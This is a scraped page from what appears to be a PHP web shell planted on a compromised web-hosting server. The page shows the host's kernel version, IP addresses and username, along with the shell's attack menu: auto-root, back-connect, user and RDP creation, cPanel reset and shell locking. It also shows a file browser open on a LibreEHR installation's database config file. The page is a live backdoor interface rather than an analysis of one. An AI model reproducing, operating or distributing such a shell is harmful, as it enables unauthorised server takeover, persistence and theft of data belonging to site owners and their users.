Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.137.166.61
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
libre /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
edit.php
4.3
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
392
B
-rw-r--r--
import.php
3.23
KB
-rw-r--r--
info.xml
2.94
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.88
KB
-rw-r--r--
install.xml
770
B
-rw-r--r--
md5
2.32
KB
-rw-r--r--
notes.txt
206
B
-rw-r--r--
sqlconf.php
657
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sqlconf.php
<?php // LibreEHR // MySQL Config $host = '[[softdbhost]]'; $port = '3306'; $login = '[[softdbuser]]'; $pass = '[[softdbpass]]'; $dbase = '[[softdb]]'; //Added ability to disable //utf8 encoding - bm 05-2009 global $disable_utf8_flag; $disable_utf8_flag = false; $sqlconf = array(); global $sqlconf; $sqlconf["host"]= $host; $sqlconf["port"] = $port; $sqlconf["login"] = $login; $sqlconf["pass"] = $pass; $sqlconf["dbase"] = $dbase; ////////////////////////// ////////////////////////// ////////////////////////// //////DO NOT TOUCH THIS/// $config = 1; ///////////// ////////////////////////// ////////////////////////// ////////////////////////// ?>
Close